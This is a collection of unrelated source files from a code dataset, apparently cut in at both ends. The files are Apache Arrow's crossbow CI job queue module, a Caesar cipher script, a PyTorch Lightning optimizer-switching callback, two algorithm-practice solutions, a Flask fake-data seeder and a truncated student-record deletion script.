re.compile(r'[\\w\\/-]*-(\\d+)-(\\d+)-(\\d+)')\n match_prefix = prefix_date_pattern.match(prefix)\n if match_prefix:\n return match_prefix.group(0)[-10:]\n\n def _latest_prefix_date(self, prefix):\n pattern = re.compile(r'[\\w\\/-]*{}-(\\d+)-(\\d+)-(\\d+)'.format(prefix))\n matches = list(filter(None, map(pattern.match, self.repo.branches)))\n if matches:\n latest = sorted([m.group(0) for m in matches])[-1]\n # slice the trailing date part (YYYY-MM-DD)\n latest = latest[-10:]\n else:\n latest = -1\n return latest\n\n def _next_job_id(self, prefix):\n \"\"\"Auto increments the branch's identifier based on the prefix\"\"\"\n latest_id = self._latest_prefix_id(prefix)\n return '{}-{}'.format(prefix, latest_id + 1)\n\n def _new_hex_id(self, prefix):\n \"\"\"Append a new id to branch's identifier based on the prefix\"\"\"\n hex_id = uuid.uuid4().hex[:10]\n return '{}-{}'.format(prefix, hex_id)\n\n def latest_for_prefix(self, prefix):\n prefix_date = self._prefix_contains_date(prefix)\n if prefix.startswith(\"nightly\") and not prefix_date:\n latest_id = self._latest_prefix_date(prefix)\n if not latest_id:\n raise RuntimeError(\n f\"No job has been submitted with prefix '{prefix}'' yet\"\n )\n latest_id += \"-0\"\n else:\n latest_id = self._latest_prefix_id(prefix)\n if latest_id < 0:\n raise RuntimeError(\n f\"No job has been submitted with prefix '{prefix}' yet\"\n )\n job_name = '{}-{}'.format(prefix, latest_id)\n return self.get(job_name)\n\n def date_of(self, job):\n # it'd be better to bound to the queue repository on deserialization\n # and reorganize these methods to Job\n branch_name = 'origin/{}'.format(job.branch)\n branch = self.repo.branches[branch_name]\n commit = self.repo[branch.target]\n return date.fromtimestamp(commit.commit_time)\n\n def jobs(self, pattern):\n \"\"\"Return jobs sorted by its identifier in reverse order\"\"\"\n job_names = []\n for name in self.repo.branches.remote:\n origin, name = name.split('/', 1)\n result = re.match(pattern, name)\n if result:\n job_names.append(name)\n\n for name in sorted(job_names, reverse=True):\n yield self.get(name)\n\n def get(self, job_name):\n branch_name = 'origin/{}'.format(job_name)\n branch = self.repo.branches[branch_name]\n try:\n content = self.file_contents(branch.target, 'job.yml')\n except KeyError:\n raise CrossbowError(\n 'No job is found with name: {}'.format(job_name)\n )\n\n buffer = StringIO(content.decode('utf-8'))\n job = yaml.load(buffer)\n job.queue = self\n return job\n\n def put(self, job, prefix='build', increment_job_id=True):\n if not isinstance(job, Job):\n raise CrossbowError('`job` must be an instance of Job')\n if job.branch is not None:\n raise CrossbowError('`job.branch` is automatically generated, '\n 'thus it must be blank')\n\n job.queue = self\n if increment_job_id:\n # auto increment and set next job id, e.g. build-85\n job.branch = self._next_job_id(prefix)\n else:\n # set new branch to something unique, e.g. build-41d017af40\n job.branch = self._new_hex_id(prefix)\n\n # create tasks' branches\n for task_name, task in job.tasks.items():\n # adding CI's name to the end of the branch in order to use skip\n # patterns on travis and circleci\n task.branch = '{}-{}-{}'.format(job.branch, task.ci, task_name)\n params = {\n **job.params,\n \"arrow\": job.target,\n \"job\": job,\n \"queue_remote_url\": self.remote_url\n }\n files = task.render_files(job.template_searchpath, params=params)\n branch = self.create_branch(task.branch, files=files)\n self.create_tag(task.tag, branch.target)\n task.commit = str(branch.target)\n\n # create job's branch with its description\n return self.create_branch(job.branch, files=job.render_files())\n\n\ndef get_version(root, **kwargs):\n \"\"\"\n Parse function for setuptools_scm that ignores tags for non-C++\n subprojects, e.g. apache-arrow-js-XXX tags.\n \"\"\"\n from setuptools_scm.git import parse as parse_git_version\n\n # query the calculated version based on the git tags\n kwargs['describe_command'] = (\n 'git describe --dirty --tags --long --match \"apache-arrow-[0-9]*.*\"'\n )\n version = parse_git_version(root, **kwargs)\n tag = str(version.tag)\n\n # We may get a development tag for the next version, such as \"5.0.0.dev0\",\n # or the tag of an already released version, such as \"4.0.0\".\n # In the latter case, we need to increment the version so that the computed\n # version comes after any patch release (the next feature version after\n # 4.0.0 is 5.0.0).\n pattern = r\"^(\\d+)\\.(\\d+)\\.(\\d+)\"\n match = re.match(pattern, tag)\n major, minor, patch = map(int, match.groups())\n if 'dev' not in tag:\n major += 1\n\n return \"{}.{}.{}.dev{}\".format(major, minor, patch, version.distance or 0)\n\n\nclass Serializable:\n\n @classmethod\n def to_yaml(cls, representer, data):\n tag = '!{}'.format(cls.__name__)\n dct = {k: v for k, v in data.__dict__.items() if not k.startswith('_')}\n return representer.represent_mapping(tag, dct)\n\n\nclass Target(Serializable):\n \"\"\"\n Describes target repository and revision the builds run against\n\n This serializable data container holding information about arrow's\n git remote, branch, sha and version number as well as some metadata\n (currently only an email address where the notification should be sent).\n \"\"\"\n\n def __init__(self, head, branch, remote, version, r_version, email=None):\n self.head = head\n self.email = email\n self.branch = branch\n self.remote = remote\n self.github_repo = \"/\".join(_parse_github_user_repo(remote))\n self.version = version\n self.r_version = r_version\n self.no_rc_version = re.sub(r'-rc\\d+\\Z', '', version)\n self.no_rc_r_version = re.sub(r'-rc\\d+\\Z', '', r_version)\n # Semantic Versioning 1.0.0: https://semver.org/spec/v1.0.0.html\n #\n # > A pre-release version number MAY be denoted by appending an\n # > arbitrary string immediately following the patch version and a\n # > dash. The string MUST be comprised of only alphanumerics plus\n # > dash [0-9A-Za-z-].\n #\n # Example:\n #\n # '0.16.1.dev10' ->\n # '0.16.1-dev10'\n self.no_rc_semver_version = \\\n re.sub(r'\\.(dev\\d+)\\Z', r'-\\1', self.no_rc_version)\n # Substitute dev version for SNAPSHOT\n #\n # Example:\n #\n # '10.0.0.dev235' ->\n # '10.0.0-SNAPSHOT'\n self.no_rc_snapshot_version = re.sub(\n r'\\.(dev\\d+)$', '-SNAPSHOT', self.no_rc_version)\n\n @classmethod\n def from_repo(cls, repo, head=None, branch=None, remote=None, version=None,\n email=None):\n \"\"\"Initialize from a repository\n\n Optionally override detected remote, branch, head, and/or version.\n \"\"\"\n assert isinstance(repo, Repo)\n\n if head is None:\n head = str(repo.head.target)\n if branch is None:\n branch = repo.branch.branch_name\n if remote is None:\n remote = repo.remote_url\n if version is None:\n version = get_version(repo.path)\n if email is None:\n email = repo.user_email\n\n version_dev_match = re.match(r\".*\\.dev(\\d+)$\", version)\n if version_dev_match:\n with open(f\"{repo.path}/r/DESCRIPTION\") as description_file:\n description = description_file.read()\n r_version_pattern = re.compile(r\"^Version:\\s*(.*)$\",\n re.MULTILINE)\n r_version = re.findall(r_version_pattern, description)[0]\n if r_version:\n version_dev = int(version_dev_match[1])\n # \"1_0000_00_00 +\" is for generating a greater version\n # than YYYYMMDD. For example, 1_0000_00_01\n # (version_dev == 1 case) is greater than 2022_10_16.\n #\n # Why do we need a greater version than YYYYMMDD? It's\n # for keeping backward compatibility. We used\n # MAJOR.MINOR.PATCH.YYYYMMDD as our nightly package\n # version. (See also ARROW-16403). If we use \"9000 +\n # version_dev\" here, a developer that used\n # 9.0.0.20221016 can't upgrade to the later nightly\n # package unless we release 10.0.0. Because 9.0.0.9234\n # or something is less than 9.0.0.20221016.\n r_version_dev = 1_0000_00_00 + version_dev\n # version: 10.0.0.dev234\n # r_version: 9.0.0.9000\n # -> 9.0.0.100000234\n r_version = re.sub(r\"\\.9000\\Z\", f\".{r_version_dev}\", r_version)\n else:\n r_version = version\n else:\n r_version = version\n\n return cls(head=head, email=email, branch=branch, remote=remote,\n version=version, r_version=r_version)\n\n def is_default_branch(self):\n return self.branch == 'main'\n\n\nclass Task(Serializable):\n \"\"\"\n Describes a build task and metadata required to render CI templates\n\n A task is represented as a single git commit and branch containing jinja2\n rendered files (currently appveyor.yml or .travis.yml configurations).\n\n A task can't be directly submitted to a queue, must belong to a job.\n Each task's unique identifier is its branch name, which is generated after\n submitting the job to a queue.\n \"\"\"\n\n def __init__(self, name, ci, template, artifacts=None, params=None):\n assert ci in {\n 'circle',\n 'travis',\n 'appveyor',\n 'azure',\n 'github',\n 'drone',\n }\n self.name = name\n self.ci = ci\n self.template = template\n self.artifacts = artifacts or []\n self.params = params or {}\n self.branch = None # filled after adding to a queue\n self.commit = None # filled after adding to a queue\n self._queue = None # set by the queue object after put or get\n self._status = None # status cache\n self._assets = None # assets cache\n\n def render_files(self, searchpath, params=None):\n params = {**self.params, **(params or {}), \"task\": self}\n try:\n rendered = _render_jinja_template(searchpath, self.template,\n params=params)\n except jinja2.TemplateError as e:\n raise RuntimeError(\n 'Failed to render template `{}` with {}: {}'.format(\n self.template, e.__class__.__name__, str(e)\n )\n )\n\n tree = {**_default_tree, self.filename: rendered}\n return _unflatten_tree(tree)\n\n @property\n def tag(self):\n return self.branch\n\n @property\n def filename(self):\n config_files = {\n 'circle': '.circleci/config.yml',\n 'travis': '.travis.yml',\n 'appveyor': 'appveyor.yml',\n 'azure': 'azure-pipelines.yml',\n 'github': '.github/workflows/crossbow.yml',\n 'drone': '.drone.yml',\n }\n return config_files[self.ci]\n\n def status(self, force_query=False):\n _status = getattr(self, '_status', None)\n if force_query or _status is None:\n github_commit = self._queue.github_commit(self.commit)\n self._status = TaskStatus(github_commit)\n return self._status\n\n def assets(self, force_query=False, validate_patterns=True):\n _assets = getattr(self, '_assets', None)\n if force_query or _assets is None:\n github_release = self._queue.github_release(self.tag)\n self._assets = TaskAssets(github_release,\n artifact_patterns=self.artifacts,\n validate_patterns=validate_patterns)\n return self._assets\n\n\nclass TaskStatus:\n \"\"\"\n Combine the results from status and checks API to a single state.\n\n Azure pipelines uses checks API which doesn't provide a combined\n interface like status API does, so we need to manually combine\n both the commit statuses and the commit checks coming from\n different API endpoint\n\n Status.state: error, failure, pending or success, default pending\n CheckRun.status: queued, in_progress or completed, default: queued\n CheckRun.conclusion: success, failure, neutral, cancelled, timed_out\n or action_required, only set if\n CheckRun.status == 'completed'\n\n 1. Convert CheckRun's status and conclusion to one of Status.state\n 2. Merge the states based on the following rules:\n - failure if any of the contexts report as error or failure\n - pending if there are no statuses or a context is pending\n - success if the latest status for all contexts is success\n error otherwise.\n\n Parameters\n ----------\n commit : github3.Commit\n Commit to query the combined status for.\n\n Returns\n -------\n TaskStatus(\n combined_state='error|failure|pending|success',\n github_status='original github status object',\n github_check_runs='github checks associated with the commit',\n total_count='number of statuses and checks'\n )\n \"\"\"\n\n def __init__(self, commit):\n status = commit.status()\n check_runs = list(commit.check_runs())\n states = [s.state for s in status.statuses]\n\n for check in check_runs:\n if check.status == 'completed':\n if check.conclusion in {'success', 'failure'}:\n states.append(check.conclusion)\n elif check.conclusion in {'cancelled', 'timed_out',\n 'action_required'}:\n states.append('error')\n # omit `neutral` conclusion\n else:\n states.append('pending')\n\n # it could be more effective, but the following is more descriptive\n combined_state = 'error'\n if len(states):\n if any(state in {'error', 'failure'} for state in states):\n combined_state = 'failure'\n elif any(state == 'pending' for state in states):\n combined_state = 'pending'\n elif all(state == 'success' for state in states):\n combined_state = 'success'\n\n # show link to the actual build, some of the CI providers implement\n # the statuses API others implement the checks API, so display both\n build_links = [s.target_url for s in status.statuses]\n build_links += [c.html_url for c in check_runs]\n\n self.combined_state = combined_state\n self.github_status = status\n self.github_check_runs = check_runs\n self.total_count = len(states)\n self.build_links = build_links\n\n\nclass TaskAssets(dict):\n\n def __init__(self, github_release, artifact_patterns,\n validate_patterns=True):\n # HACK(kszucs): don't expect uploaded assets of no artifacts were\n # defined for the tasks in order to spare a bit of github rate limit\n if not artifact_patterns:\n return\n\n if github_release is None:\n github_assets = {} # no assets have been uploaded for the task\n else:\n github_assets = {a.name: a for a in github_release.assets()}\n\n if not validate_patterns:\n # shortcut to avoid pattern validation and just set all artifacts\n return self.update(github_assets)\n\n for pattern in artifact_patterns:\n # artifact can be a regex pattern\n compiled = re.compile(f\"^{pattern}$\")\n matches = list(\n filter(None, map(compiled.match, github_assets.keys()))\n )\n num_matches = len(matches)\n\n # validate artifact pattern matches single asset\n if num_matches == 0:\n self[pattern] = None\n elif num_matches == 1:\n self[pattern] = github_assets[matches[0].group(0)]\n else:\n raise CrossbowError(\n 'Only a single asset should match pattern `{}`, there are '\n 'multiple ones: {}'.format(pattern, ', '.join(matches))\n )\n\n def missing_patterns(self):\n return [pattern for pattern, asset in self.items() if asset is None]\n\n def uploaded_assets(self):\n return [asset for asset in self.values() if asset is not None]\n\n\nclass Job(Serializable):\n \"\"\"Describes multiple tasks against a single target repository\"\"\"\n\n def __init__(self, target, tasks, params=None, template_searchpath=None):\n if not tasks:\n raise ValueError('no tasks were provided for the job')\n if not all(isinstance(task, Task) for task in tasks.values()):\n raise ValueError('each `tasks` mus be an instance of Task')\n if not isinstance(target, Target):\n raise ValueError('`target` must be an instance of Target')\n if not isinstance(params, dict):\n raise ValueError('`params` must be an instance of dict')\n\n self.target = target\n self.tasks = tasks\n self.params = params or {} # additional parameters for the tasks\n self.branch = None # filled after adding to a queue\n self._queue = None # set by the queue object after put or get\n if template_searchpath is None:\n self._template_searchpath = ArrowSources.find().path\n else:\n self._template_searchpath = template_searchpath\n\n def render_files(self):\n with StringIO() as buf:\n yaml.dump(self, buf)\n content = buf.getvalue()\n tree = {**_default_tree, \"job.yml\": content}\n return _unflatten_tree(tree)\n\n def render_tasks(self, params=None):\n result = {}\n params = {\n **self.params,\n \"arrow\": self.target,\n \"job\": self,\n **(params or {})\n }\n for task_name, task in self.tasks.items():\n files = task.render_files(self._template_searchpath, params)\n result[task_name] = files\n return result\n\n @property\n def template_searchpath(self):\n return self._template_searchpath\n\n @property\n def queue(self):\n assert isinstance(self._queue, Queue)\n return self._queue\n\n @queue.setter\n def queue(self, queue):\n assert isinstance(queue, Queue)\n self._queue = queue\n for task in self.tasks.values():\n task._queue = queue\n\n @property\n def email(self):\n return os.environ.get('CROSSBOW_EMAIL', self.target.email)\n\n @property\n def date(self):\n return self.queue.date_of(self)\n\n def show(self, stream=None):\n return yaml.dump(self, stream=stream)\n\n @classmethod\n def from_config(cls, config, target, tasks=None, groups=None, params=None):\n \"\"\"\n Instantiate a job from based on a config.\n\n Parameters\n ----------\n config : dict\n Deserialized content of tasks.yml\n target : Target\n Describes target repository and revision the builds run against.\n tasks : Optional[List[str]], default None\n List of glob patterns for matching task names.\n groups : Optional[List[str]], default None\n List of exact group names matching predefined task sets in the\n config.\n params : Optional[Dict[str, str]], default None\n Additional rendering parameters for the task templates.\n\n Returns\n -------\n Job\n\n Raises\n ------\n Exception:\n If invalid groups or tasks has been passed.\n \"\"\"\n task_definitions = config.select(tasks, groups=groups)\n\n # instantiate the tasks\n tasks = {}\n versions = {\n 'version': target.version,\n 'no_rc_version': target.no_rc_version,\n 'no_rc_semver_version': target.no_rc_semver_version,\n 'no_rc_snapshot_version': target.no_rc_snapshot_version,\n 'r_version': target.r_version,\n 'no_rc_r_version': target.no_rc_r_version,\n }\n for task_name, task in task_definitions.items():\n task = task.copy()\n artifacts = task.pop('artifacts', None) or [] # because of yaml\n artifacts = [fn.format(**versions) for fn in artifacts]\n tasks[task_name] = Task(task_name, artifacts=artifacts, **task)\n return cls(target=target, tasks=tasks, params=params,\n template_searchpath=config.template_searchpath)\n\n def is_finished(self):\n for task in self.tasks.values():\n status = task.status(force_query=True)\n if status.combined_state == 'pending':\n return False\n return True\n\n def wait_until_finished(self, poll_max_minutes=120,\n poll_interval_minutes=10):\n started_at = time.time()\n while True:\n if self.is_finished():\n break\n\n waited_for_minutes = (time.time() - started_at) / 60\n if waited_for_minutes > poll_max_minutes:\n msg = ('Exceeded the maximum amount of time waiting for job '\n 'to finish, waited for {} minutes.')\n raise RuntimeError(msg.format(waited_for_minutes))\n\n logger.info('Waiting {} minutes and then checking again'\n .format(poll_interval_minutes))\n time.sleep(poll_interval_minutes * 60)\n\n\nclass Config(dict):\n\n def __init__(self, tasks, template_searchpath):\n super().__init__(tasks)\n self.template_searchpath = template_searchpath\n\n @classmethod\n def load_yaml(cls, path):\n path = Path(path)\n searchpath = path.parent\n rendered = _render_jinja_template(searchpath, template=path.name,\n params={})\n config = yaml.load(rendered)\n return cls(config, template_searchpath=searchpath)\n\n def show(self, stream=None):\n return yaml.dump(dict(self), stream=stream)\n\n def select(self, tasks=None, groups=None):\n config_groups = dict(self['groups'])\n config_tasks = dict(self['tasks'])\n valid_groups = set(config_groups.keys())\n valid_tasks = set(config_tasks.keys())\n group_allowlist = list(groups or [])\n task_allowlist = list(tasks or [])\n\n # validate that the passed groups are defined in the config\n requested_groups = set(group_allowlist)\n invalid_groups = requested_groups - valid_groups\n if invalid_groups:\n msg = 'Invalid group(s) {!r}. Must be one of {!r}'.format(\n invalid_groups, valid_groups\n )\n raise CrossbowError(msg)\n\n # treat the task names as glob patterns to select tasks more easily\n requested_tasks = set()\n for pattern in task_allowlist:\n matches = fnmatch.filter(valid_tasks, pattern)\n if len(matches):\n requested_tasks.update(matches)\n else:\n raise CrossbowError(\n \"Unable to match any tasks for `{}`\".format(pattern)\n )\n\n requested_group_tasks = set()\n for group in group_allowlist:\n # separate the patterns from the blocklist patterns\n task_patterns = list(config_groups[group])\n task_blocklist_patterns = [\n x.strip(\"~\") for x in task_patterns if x.startswith(\"~\")]\n task_patterns = [x for x in task_patterns if not x.startswith(\"~\")]\n\n # treat the task names as glob patterns to select tasks more easily\n for pattern in task_patterns:\n matches = fnmatch.filter(valid_tasks, pattern)\n if len(matches):\n requested_group_tasks.update(matches)\n else:\n raise CrossbowError(\n \"Unable to match any tasks for `{}`\".format(pattern)\n )\n\n # remove any tasks that are negated with ~task-name\n for block_pattern in task_blocklist_patterns:\n matches = fnmatch.filter(valid_tasks, block_pattern)\n if len(matches):\n requested_group_tasks = requested_group_tasks.difference(\n matches)\n else:\n raise CrossbowError(\n \"Unable to match any tasks for `{}`\".format(pattern)\n )\n\n requested_tasks = requested_tasks.union(requested_group_tasks)\n\n # validate that the passed and matched tasks are defined in the config\n invalid_tasks = requested_tasks - valid_tasks\n if invalid_tasks:\n msg = 'Invalid task(s) {!r}. Must be one of {!r}'.format(\n invalid_tasks, valid_tasks\n )\n raise CrossbowError(msg)\n\n return {\n task_name: config_tasks[task_name] for task_name in requested_tasks\n }\n\n def validate(self):\n # validate that the task groups are properly referring to the tasks\n for group_name, group in self['groups'].items():\n for pattern in group:\n # remove the negation character for blocklisted tasks\n pattern = pattern.strip(\"~\")\n tasks = self.select(tasks=[pattern])\n if not tasks:\n raise CrossbowError(\n \"The pattern `{}` defined for task group `{}` is not \"\n \"matching any of the tasks defined in the \"\n \"configuration file.\".format(pattern, group_name)\n )\n\n # validate that the tasks are constructible\n for task_name, task in self['tasks'].items():\n try:\n Task(task_name, **task)\n except Exception as e:\n raise CrossbowError(\n 'Unable to construct a task object from the '\n 'definition of task `{}`. The original error message '\n 'is: `{}`'.format(task_name, str(e))\n )\n\n # Get the default branch name from the repository\n arrow_source_dir = ArrowSources.find()\n repo = Repo(arrow_source_dir.path)\n\n # validate that the defined tasks are renderable, in order to to that\n # define the required object with dummy data\n target = Target(\n head='e279a7e06e61c14868ca7d71dea795420aea6539',\n branch=repo.default_branch_name,\n remote='https://github.com/apache/arrow',\n version='1.0.0dev123',\n r_version='0.13.0.100000123',\n email='dummy@example.ltd'\n )\n job = Job.from_config(config=self,\n target=target,\n tasks=self['tasks'],\n groups=self['groups'],\n params={})\n\n for task_name, task in self['tasks'].items():\n task = Task(task_name, **task)\n files = task.render_files(\n self.template_searchpath,\n params=dict(\n arrow=target,\n job=job,\n queue_remote_url='https://github.com/org/crossbow'\n )\n )\n if not files:\n raise CrossbowError('No files have been rendered for task `{}`'\n .format(task_name))\n\n\n# configure yaml serializer\nyaml = YAML()\nyaml.register_class(Job)\nyaml.register_class(Task)\nyaml.register_class(Target)\nyaml.register_class(Queue)\nyaml.register_class(TaskStatus)\n","repo_name":"apache/arrow","sub_path":"dev/archery/archery/crossbow/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":49457,"program_lang":"python","lang":"en","doc_type":"code","stars":12777,"dataset":"github-code","pt":"29"} +{"seq_id":"72269816397","text":"# runs the ceasar cypher\n\n# define alphabet twice\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n# define cipher function\ndef caesar(start_text, shift_amount, cipher_direction):\n final_text = \"\"\n if cipher_direction == \"decode\":\n shift_amount *= -1\n for char in start_text:\n if char in alphabet:\n slot = alphabet.index(char)\n new_slot = slot + shift_amount\n final_text += alphabet[new_slot]\n else:\n final_text += char\n print(f\"{cipher_direction}d message: {final_text}\")\n\n# stop / go logic\nquit_or_not = False\nwhile not quit_or_not:\n\n direction = input(\"input 'encode' to encrypt, input 'decode' to decrypt:\\n\")\n text = input(\"input your message:\\n\").lower()\n shift = int(input(\"input the shift number:\\n\"))\n # cap out at max number of letters\n shift = shift % 26\n # call actual function\n caesar(start_text=text, shift_amount=shift, cipher_direction=direction)\n # determine if we call again\n quit = input(\"input 'yes' to cipher more or 'no' to end.\\n\")\n if quit == \"no\":\n quit_or_not = True\n print(\"👍\")\n","repo_name":"swantron/python_tools","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15772342288","text":"import torch\nfrom pytorch_lightning.callbacks import Callback\n\n\nclass RefineSolution(Callback):\n def __init__(self, thr: float = 1e-5):\n super().__init__()\n self.monitor = 'valid_loss'\n self.thr = thr\n self.is_enabled = False\n \n def on_validation_end(self, trainer, model):\n logs = trainer.callback_metrics\n if (not self.is_enabled) and logs.get(self.monitor) < 1e-6:\n print('Switched to LBFGS')\n trainer.optimizers = [torch.optim.LBFGS(model.parameters(), lr=1e-4)]\n self.is_enabled = True\n # trainer.lr_schedulers = trainer.configure_schedulers([new_schedulers])","repo_name":"Chutlhu/TurboSuperResultion","sub_path":"turboflow/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"6697602908","text":"import sys\ninput = sys.stdin.readline\n\nN = int(input())\narr = [list(map(int, input().split())) for _ in range(N)]\nmax_sum = [[0,0,0],[0,0,0]]\nmin_sum = [[0,0,0],[0,0,0]]\n# 슬라이딩 윈도우 N까지 미끄러짐. // dp를 같이 쓰는데 dp를 모두 저장하는 것이 아니라 전의 값과 현재 계산할 칸만 남겨둠.\nfor i in range(0,N):\n\n max_sum[1][0] = max(max_sum[0][1], max_sum[0][0]) + arr[i][0]\n max_sum[1][1] = max(max_sum[0][1], max_sum[0][2], max_sum[0][0]) + arr[i][1]\n max_sum[1][2] = max(max_sum[0][1], max_sum[0][2]) + arr[i][2]\n\n min_sum[1][0] = min(min_sum[0][0], min_sum[0][1]) + arr[i][0]\n min_sum[1][1] = min(min_sum[0][1], min_sum[0][2], min_sum[0][0]) + arr[i][1]\n min_sum[1][2] = min(min_sum[0][1], min_sum[0][2]) + arr[i][2]\n\n max_sum.append(max_sum.pop(0))\n min_sum.append(min_sum.pop(0))\n\nprint(max(max_sum[0]), min(min_sum[0]))\n\n# 아래도 동일한 방식이나 한줄에 연산을 해 값이 바뀌는것을막음(tmp배열을 쓰지 않도록 설계 이전값 없이 현재값에 계속 최신화 하게끔 함.)\n# import sys\n# input = sys.stdin.readline\n# n = int(input())\n# s = [list(map(int, input().split())) for i in range(n)]\n# lax, cax, rax = s[0][0], s[0][1], s[0][2]\n# lin, cin, rin = s[0][0], s[0][1], s[0][2]\n# for i in range(1, n):\n# lax, cax, rax = max(lax, cax) + s[i][0], max(lax, cax, rax) + s[i][1], max(cax, rax) + s[i][2]\n# lin, cin, rin = min(lin, cin) + s[i][0], min(lin, cin, rin) + s[i][1], min(cin, rin) + s[i][2]\n# print(max(lax, cax, rax), min(lin, cin, rin))","repo_name":"chaselover/practiceAlgorithm","sub_path":"2096내려가기.py","file_name":"2096내려가기.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"31044566950","text":"class Solution:\n def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n # 以下为参考用时击败100%用户的代码\n n = len(temperatures)\n ans = [0] * n\n stack = []\n for i in range(n):\n while stack and temperatures[i] > temperatures[stack[-1]]:\n index = stack.pop()\n ans[index] = i - index\n stack.append(i)\n return ans\n\n # 以下为参考题解完成的代码,用时击败6.41%\n # n = len(temperatures)\n # ans = [0 for _ in range(n)]\n # stack = list()\n # for i in range(n):\n # if len(stack) == 0: stack.append(i)\n # else:\n # while len(stack) > 0 and temperatures[i] > temperatures[stack[len(stack)-1]]:\n # ans[stack[len(stack)-1]] = i-stack[len(stack)-1]\n # stack.pop()\n # stack.append(i)\n # return ans\n\n # 以下是此题的初始思路,此方法会超时\n # n = len(temperatures)\n # if n == 1: return [0]\n # l, r = 0, 1\n # # 基础思路:固定l指针作为当前循环的下标,r为搜索下一更高气温的下标,如果能搜到则加入答案列表,如果r=n时还没搜到则说明搜不到,答案中加入0\n # # 优化:假设r为对应t[l]的答案,如果t[l+1]=t[l],则t[l+1]对应的答案也是r;如果t[l+1]>t[l],则t[l+1]对应答案的下标一定大于r;如果t[l+1] temperatures[l-1]: r = pre\n # else: r = l+1\n # while r < n:\n # if temperatures[r] > temperatures[l]:\n # ans.append(r-l)\n # pre = r\n # break\n # r += 1\n # return ans\n","repo_name":"ColdCode0214/LeetCode_local","sub_path":"038-每日温度.py","file_name":"038-每日温度.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"29369880621","text":"from api import db\nfrom sqlalchemy.exc import IntegrityError\nfrom api.models import User, Post, follower, Comment, Notification, Task, assignment\nfrom faker import Faker\nfrom flask import current_app\nfrom secrets import randbelow\n\n\ndef fake_users(count=10): # nosec\n fake = Faker()\n u = User(\n username='username',\n password='password',\n email=current_app.config['MAIL_FOR_TEST_OR_DEBUG'] or 'test@test.gr',\n bitcoin_address=fake.md5(),\n confirmed=True,\n name=fake.name(),\n location=fake.city(),\n member_since=fake.past_date())\n db.session.add(u)\n print('Default user-admin: \"useruser:password\"')\n for i in range(count):\n print('Generating fake user %d' % i, end=\"\\r\")\n u = User(\n username=fake.user_name(),\n email=fake.email(),\n bitcoin_address=fake.md5(),\n password='password',\n confirmed=True,\n name=fake.name(),\n location=fake.city(),\n member_since=fake.past_date())\n db.session.add(u)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef fake_follows(count=100): # nosec\n user_count = User.query.count()\n for i in range(count):\n print('Generating fake follow %d' % i, end=\"\\r\")\n u1 = User.query.offset(randbelow(user_count)).first()\n u2 = User.query.offset(randbelow(user_count)).first()\n db.session.execute(follower.insert().values(\n follower_id=u1.id,\n followed_id=u2.id\n ))\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef fake_posts(count=20): # nosec\n fake = Faker()\n user_count = User.query.count()\n for i in range(count):\n print('Generating fake post %d' % i, end=\"\\r\")\n u = User.query.offset(randbelow(user_count)).first()\n p = Post(\n body=fake.text(),\n timestamp=fake.past_date(),\n user_id=u.id\n )\n db.session.add(p)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef fake_comments(count=50): # nosec\n fake = Faker()\n user_count = User.query.count()\n post_count = Post.query.count()\n for i in range(count):\n print('Generating fake comments %d' % i, end=\"\\r\")\n u = User.query.offset(randbelow(user_count)).first()\n p = Post.query.offset(randbelow(post_count)).first()\n c = Comment(\n body=fake.text(),\n timestamp=fake.past_date(),\n user_id=u.id,\n post_id=p.id\n )\n db.session.add(c)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef fake_notifications(count=50): # nosec\n fake = Faker()\n user_count = User.query.count()\n for i in range(count):\n print('Generating fake notifications %d' % i, end=\"\\r\")\n u = User.query.offset(randbelow(user_count)).first()\n n = Notification(user_id=u.id, body=fake.text(),\\\n timestamp=fake.past_date())\n db.session.add(n)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n \ndef fake_tasks(count=50): # nosec\n fake = Faker()\n user_count = User.query.filter_by().count()\n for i in range(count):\n print('Generating fake task %d' % i, end=\"\\r\")\n assigneed_from = User.query.offset(randbelow(user_count)).first()\n assigned_to = User.query.offset(randbelow(user_count)).first()\n t = Task(\n name=fake.bs(),\n description=fake.text(),\n value=float(fake.pricetag().replace('$', '').replace(',', '')),\n url=fake.url(),\n timestamp=fake.past_date(),\n due_date=fake.future_date(),\n assignee_id=assigneed_from.id,\n )\n db.session.add(t)\n db.session.commit()\n db.session.execute(assignment.insert().values(\n task_id=t.id,\n assigned_id=assigned_to.id,\n ))\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()","repo_name":"Haki-Malai/arctic-fox","sub_path":"backend/api/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70524307918","text":"import read_file as Rf\nimport write_file as Wf\nimport tishi as ts\n#import get_path\ndef shan_chu():\n\t'''\n\t删除学生条目\n\t'''\n\tl = Rf.read_file()\n#\tprint(l)\n\tsc = input('输入需要删除的学生的姓名:')\n\n\tfor i in l:\n\t\tif i['姓名'] ==sc:\n\t\t\tprint('您要删除的是:',i['姓名'],'请确认(y/n)')\n\t\t\tqr = input()\n\t\t\tif qr =='y':\n\t\t\t\tshan_chu = 